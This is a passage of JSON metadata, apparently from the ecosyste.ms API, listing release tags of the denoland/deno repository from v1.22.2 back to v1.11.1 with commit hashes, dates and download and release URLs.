osts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.